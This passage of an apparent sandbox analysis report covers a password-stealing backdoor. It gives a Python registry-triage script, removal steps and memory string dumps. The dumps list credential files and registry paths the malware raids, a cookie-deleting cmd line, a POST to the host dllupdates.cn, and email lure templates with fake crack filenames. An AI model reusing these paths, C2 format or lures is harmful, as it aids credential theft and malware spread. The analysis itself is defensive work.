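    value: str

def parse_registry_activity(text: str) -> List[RegEntry]:
    """Turn the report's registry listing into (key, name, value) records."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if (m := KEY_RE.match(line)):
            current = m.group(1)
        elif current and (m := VALUE_RE.match(line)):
            entries.append(RegEntry(current, m.group(1), m.group(2)))
    return entries

def classify(entry: RegEntry) -> str:
    for pattern, label in PERSISTENCE_RULES:
        if re.search(pattern, entry.key):
            return label
    return 'other'

def triage(text: str, dropped_files: List[str]) -> Dict[str, List[str]]:
    """Group persistence-relevant entries by mechanism; mark values that name
    one of the sandbox's dropped files."""
    findings: Dict[str, List[str]] = {}
    for e in parse_registry_activity(text):
        label = classify(e)
        if label == 'other':
            continue
        hit = any(f.lower() in e.value.lower() for f in dropped_files)
        findings.setdefault(label, []).append(
            f'{e.key} | {e.name} = {e.value}' + (' [dropped file]' if hit else ''))
    return findings

def resolve_clsid_chain(text: str) -> Dict[str, str]:
    """Map each CLSID referenced from an autorun/shell location to the DLL its
    InprocServer32 key names, so a bare GUID never hides the payload."""
    entries = parse_registry_activity(text)
    servers = {CLSID_RE.search(e.key).group(0).upper(): e.value
               for e in entries
               if e.key.endswith('InprocServer32') and e.name == '(Default)'
               and CLSID_RE.search(e.key)}
    chain: Dict[str, str] = {}
    for e in entries:
        if e.key.endswith('InprocServer32'):
            continue
        for guid in CLSID_RE.findall(e.name + ' ' + e.value):
            chain[guid.upper()] = servers.get(guid.upper(), '<no InprocServer32 seen>')
    return chain

if __name__ == '__main__':
    for mechanism, rows in triage(SAMPLE_REPORT, ['AUHook.dll', 'mdmi386.exe']).items():
        print(mechanism)
        for row in rows:
            print('   ', row)
    print(resolve_clsid_chain(SAMPLE_REPORT))
```

The same parser accepts the `[key]` / `"name"="value"` layout that `reg export` writes for REG_SZ values, so the classification can be rerun over an export of the CurrentVersion hives from a suspect host; on this sample it shows that removing the Run value alone leaves AUHook.dll loaded through ShellServiceObjectDelayLoad.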
Dropped PE files
MD5 | File path |
---|---|
69cd8f35a41fa1a5c99ee49d9a87bede | c:\WINDOWS\system32\AUHook.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1316
mdmi386.exe:1064
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor (win.ini is a legitimate Windows file: restore its original content rather than deleting it):
%System%\AUHook.dll (51 bytes)
%WinDir%\win.ini (106 bytes)
%System%\mdmi386.exe (601 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Machine Debug Manager" = "mdmi386.exe"
- Also remove the second autorun path and the COM and shell registrations that load %System%\AUHook.dll into Explorer (all written by the Backdoor, see Registry activity above):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
"AUHook" = "{BCBCD383-3E06-11D3-91A9-00C04F68105C}"
[HKCR\CLSID\{BCBCD383-3E06-11D3-91A9-00C04F68105C}]
[HKCR\CLSID\{A4C110AE-0291-F12A-2920-F0E455440770}]
[HKCR\CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved]
"{77770022-0D68-4D14-BF25-6747ACFA95DE}" = "Shell Extensions for ICQ Lite"
[HKCR\*\shellex\ContextMenuHandlers\icqlite]
[HKCR\Directory\shellex\ContextMenuHandlers\icqlite]
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 229376 | 72192 | 5.54111 | 468df37f266b084a63d51d03dbfac71c |
.idata | 233472 | 4096 | 512 | 0.705801 | 0f0355ba200199275c0ce3814e0ccd62 |
.tls | 237568 | 4096 | 512 | 0.147711 | 3ce56d9e00101a6b28ba1cc0cce53e97 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
Strings from Dumps
mdmi386.exe_1064:
.data
.code
Portions Copyright (c) 1983,99 Borland
kernel32.dll
update.symantec
liveupdate.symantecliveupdate
secure.nai
sandbox.norman
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 404
wsock32.dll
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
AUHook.dll
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.idata
.edata
.XV^x
.b.Im
advapi32.dll
RegOpenKeyA
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
core.dll
KWindows
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql
mdmi386.exe_1064_rwx_003B1000_0000C000:
h.dllhel32hkernT
.XV^x
.rsrc
.\kernel32.dll
@%.lI
,ey.yYeX
auth_loginByP
[.kyALFAIBSR/b
!!PASSC"T
2z?URL:
7A5417FF-2D82-553C-F326
/show.php HTTP/1.0
%xt/0R, im}
-url%c[
.bm a
.DirE
.tB"d
SPV%Dl
=.Ru!
1s.Hf] *
Cert
TALCMD\\
OPERA
d.lThi
-me}@l
a.cfI
KP.SJ
y.kpug5
.bpbk
.FGDV
KERNEL32.DLL
advapi32.dll
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
wsock32.dll
RegOpenKeyA
core.dll
mdmi386.exe_1064_rwx_00401000_00012000:
h.dllhel32hkernT
.data
.code
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql
kernel32.dll
mdmi386.exe_1064_rwx_00B30000_00028000:
`.rsrc
`.rsrc
Portions Copyright (c) 1983,99 Borland
Portions Copyright (c) 1983,99 Borland
kernel32.dll
kernel32.dll
update.symantec
update.symantec
liveupdate.symantecliveupdate
liveupdate.symantecliveupdate
secure.nai
secure.nai
sandbox.norman
sandbox.norman
uk.trendmicro-europe
uk.trendmicro-europe
money.yandex.ru/prepaid-ns.xml
money.yandex.ru/prepaid-ns.xml
command=auth_loginByPassword
command=auth_loginByPassword
https://click.alfabank.ru/ALFAIBSR/ControllerServlet
https://click.alfabank.ru/ALFAIBSR/ControllerServlet
command=auth_loginByPasswordPage
command=auth_loginByPasswordPage
PASS:
PASS:
CERT:
CERT:
ftp://
ftp://
http://
http://
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
POST /show.php HTTP/1.0
POST /show.php HTTP/1.0
User-Agent: Mozilla/4.4 (compatible; MSIE 6.0; Windows NT 5.1)
User-Agent: Mozilla/4.4 (compatible; MSIE 6.0; Windows NT 5.1)
Host: www.dllupdates.cn:
Host: www.dllupdates.cn:
Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1
www.dllupdates.cn
www.dllupdates.cn
/index.html
/index.html
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
:.txf
:.txf
:..tqR
:..tqR
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
.bmp::
.bmp::
ole32.dll
ole32.dll
AUHook.dll
AUHook.dll
{BCBCD383-3E06-11D3-91A9-00C04F68105C}
{BCBCD383-3E06-11D3-91A9-00C04F68105C}
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\AUHook
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\AUHook
{A4C110AE-0291-F12A-2920-F0E455440770}
{A4C110AE-0291-F12A-2920-F0E455440770}
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
Software\Microsoft\Windows\CurrentVersion\Run\Machine Debug Manager
Software\Microsoft\Windows\CurrentVersion\Run\Machine Debug Manager
mdmi386.exe
mdmi386.exe
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{77770022-0D68-4D14-BF25-6747ACFA95DE}
Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{77770022-0D68-4D14-BF25-6747ACFA95DE}
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\ThreadingModel
CLSID\{77770022-0D68-4D14-BF25-6747ACFA95DE}\InprocServer32\ThreadingModel
{77770022-0D68-4D14-BF25-6747ACFA95DE}
{77770022-0D68-4D14-BF25-6747ACFA95DE}
.164.KWM::
.164.KWM::
crypt32.dll
crypt32.dll
CertOpenSystemStoreA
CertOpenSystemStoreA
CertCloseStore
CertCloseStore
PFXExportCertStore
PFXExportCertStore
WEBMONEY.EXE
WEBMONEY.EXE
TOTALCMD.EXE
TOTALCMD.EXE
ntdll.dll
ntdll.dll
IEXPLORE.EXE
IEXPLORE.EXE
OPERA.EXE
OPERA.EXE
HttpSendRequestA
HttpSendRequestA
wininet.dll
wininet.dll
EXPLORER.EXE
EXPLORER.EXE
7A5417FF-2D82-553C-F326-2861000FFFF3-01
7A5417FF-2D82-553C-F326-2861000FFFF3-01
dxdiagn.dat
dxdiagn.dat
7A5417FF-2D82-553C-F326-2861000FFFF3
7A5417FF-2D82-553C-F326-2861000FFFF3
More information: http://www.ibsensoftware.com/
More information: http://www.ibsensoftware.com/
217.5.97.137
217.5.97.137
reg_key
reg_key
\loader_name.exe
\loader_name.exe
gdiplus.dll
gdiplus.dll
GdiplusShutdown
GdiplusShutdown
.text
.text
.reloc
.reloc
\cplstub.exe
\cplstub.exe
user32.dll
user32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HELO %s.net
HELO %s.net
HELO %s.com
HELO %s.com
HELO %s.org
HELO %s.org
MAIL FROM:<%s>
MAIL FROM:<%s>
RCPT TO:<%s>
RCPT TO:<%s>
monica@postcard.ru
monica@postcard.ru
gold-certs@
gold-certs@
certific
certific
.subscribe
.subscribe
certs@
certs@
subscribe.ru
subscribe.ru
.xml@
.xml@
.gif@
.gif@
.png@
.png@
.jpg@
.jpg@
.mso@
.mso@
.bezotveta@
.bezotveta@
.shtm
.shtm
.dhtm
.dhtm
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office 2003 Crack, Working!.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Microsoft Office XP working Crack, Keygen.exe
Porno, sex, oral, anal cool, awesome!!.exe
Porno Screensaver.scr
Serials.txt.exe
KAV 6.0.exe
Kaspersky Antivirus 6.0.exe
Porno pics arhive, xxx.exe
Windows Sourcecode update.doc.exe
Ahead Nero 7.exe
Windown Longhorn Beta Leak.exe
Opera 9 New!.exe
XXX hardcore images.exe
WinAmp 7 New!.exe
WinAmp 7 Pro Keygen Crack Update.exe
Adobe Photoshop 9 full.exe
Matrix 3 Revolution English Subtitles.exe
ACDSee 9.exe
Date: %s
To: "%s" <%s>
From: postcard service <monica></monica>
POSTCARD.RU
Comments: The best postcards in web, http://www.postcard.ru
Message-ID: <%s%s>
boundary="----=_POSTCARD.RU_%s"
------=_POSTCARD.RU_%s
Content-Type: text/html; charset="windows-1251"
------=_POSTCARD.RU_%s--
<img src="cid:%s.%s" /><br />
Password: %s
Pass - %s
Password - %s
Re: Msg reply
.ptdm { background:#707075; }
.ptdc { background:#90909A; }
.plnm { color:#FFFFFF; font-size:10px; font-weight:bold; font-family:Verdana,Tahoma,Arial,Sans-Serif; text-decoration:none; }
<a href="http://www.postcard.ru/get/?1%s" target="_blank"><table><tr><td><a href="http://%s?1%s">http://www.postcard.ru/get/?1%s</a></td></tr></table></a>
<a href="http://www.postcard.ru/" target="_blank">http://www.postcard.ru/</a><br />
monica@postcard.ru<br />
www.aerosib.ru/
www.avinyon.com/
www.basdesign.ru/
www.fivestar.spb.ru/www/index.shtml
www.siticom.ru/index.htm
www.myamoi.ru/index.html
www.firebook.ru/index.html
www.polistroy.kaluga.ru/
www.racus.ru/index.html
www.mir-polov.ru/index.html
www.mobyline.info/index.html
www.imaksi.h15.ru/index.html
advapi32.dll
iphlpapi.dll
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
C:\out.bin
PMODkernel32.dll
|shfolder.dll
psapi.dll
\account.cfg
\account.cfn
\*.dat
%s Database
Password
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\&RQ
\&RQ.exe
crypted-password
\andrq.ini
\Microsoft\Network\Connections\pbk\rasphone.pbk
RasDialParams!%s#0
SOFTWARE\Far\Plugins\FTP\Hosts
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian\
\aim.ini
\users\global\profiles.ini
Software\Ghisler\Windows Commander
FtpIniName
\wcx_ftp.ini
password
INETCOMM Server Passwords
Outlook Account Manager Passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
%s\%s\%s
%s\%s
SMTP Email Address
POP3 Password
POP3 Password2
IMAP Password
IMAP Password2
pstorec.dll
\Mailbox.ini
PassWd
\GlobalSCAPE\CuteFTP\
\GlobalSCAPE\CuteFTP Pro\
\cutftp32.exe
%Program Files%\CuteFTP\
sm.dat
tree.dat
smdata.dat
PasswordSaved
LoginSaved
\edialer.ini
WS_FTP
\*.ini
\Ipswitch\WS_FTP\Sites
\Ipswitch\WS_FTP Home\Sites
\win.ini
\ws_ftp.ini
\ws_ftp.exe
\Opera
\Mail\accounts.ini
\profile\wand.dat
Software\Opera Software
Incoming Password
\Mozilla\Profiles
%Documents and Settings%\%current user%\Application Data\The Bat!\*.*
d:\Procmon.exe
ec.exe
32.exe
ore.exe
D.EXE",-208
.dll,-20003
%Documents and Settings%\%current user%\Trillian\User Settings\
%APPDATA%\GHISLER\wcx_ftp.ini
Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\Software\Microsoft\Internet Account Manager\Accounts
Pro\6.0\sm.dat
%WinDir%\edialer.ini
e\Sites\*.ini
%WinDir%\win.ini
%Documents and Settings%\%current user%\Application Data\Opera\*.*\Mail\accounts.ini
%Documents and Settings%\%current user%\Application Data\Mozilla\Profiles\*.*
RegOpenKeyExA
RegOpenKeyA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyA
RegCloseKey
UnhookWindowsHookEx
SetWindowsHookExA
GetKeyboardType
.idata
.edata
P.reloc
P.rsrc
.bpbk
.FGDV
KERNEL32.DLL
gdi32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
wsock32.dll
core.dll
export
66006666
iER\wcx_ftp.ini
mdmi386.exe_1064_rwx_13140000_00038000:
.data
.code
Portions Copyright (c) 1983,99 Borland
kernel32.dll
update.symantec
liveupdate.symantecliveupdate
secure.nai
sandbox.norman
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 404
wsock32.dll
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
AUHook.dll
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.idata
.edata
.XV^x
.b.Im
advapi32.dll
RegOpenKeyA
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
core.dll
KWindows
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql
svchost.exe_1588:
.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512
svchost.exe_1588_rwx_13140000_00038000:
.data
.code
Portions Copyright (c) 1983,99 Borland
kernel32.dll
update.symantec
liveupdate.symantecliveupdate
secure.nai
sandbox.norman
uk.trendmicro-europe
HTTP/1.1 403
HTTP/1.1 404
wsock32.dll
svchost.exe
Software\Microsoft\Windows\CurrentVersion\Applets\MSSfc\
mdmi386.exe
AUHook.dll
AUHook.dat
7A5417FF-2D82-553C-F326-2861000FFFF3-0E
sfc.dll
cmd /q /c "echo ! && ver && echo. && echo Y | del "%USERPROFILE%\cookies\*.*" && cls "
.text
.idata
.edata
.XV^x
.b.Im
advapi32.dll
RegOpenKeyA
gdi32.dll
ole32.dll
oleaut32.dll
RASAPI32.dll
SHLWAPI.DLL
user32.dll
wininet.dll
core.dll
KWindows
Porti
.ex)N
.MS'fc
"#$%&'()
dD.Gz
P|.Zc
.Cu`k&
.nEZK
adv0pi32x.ql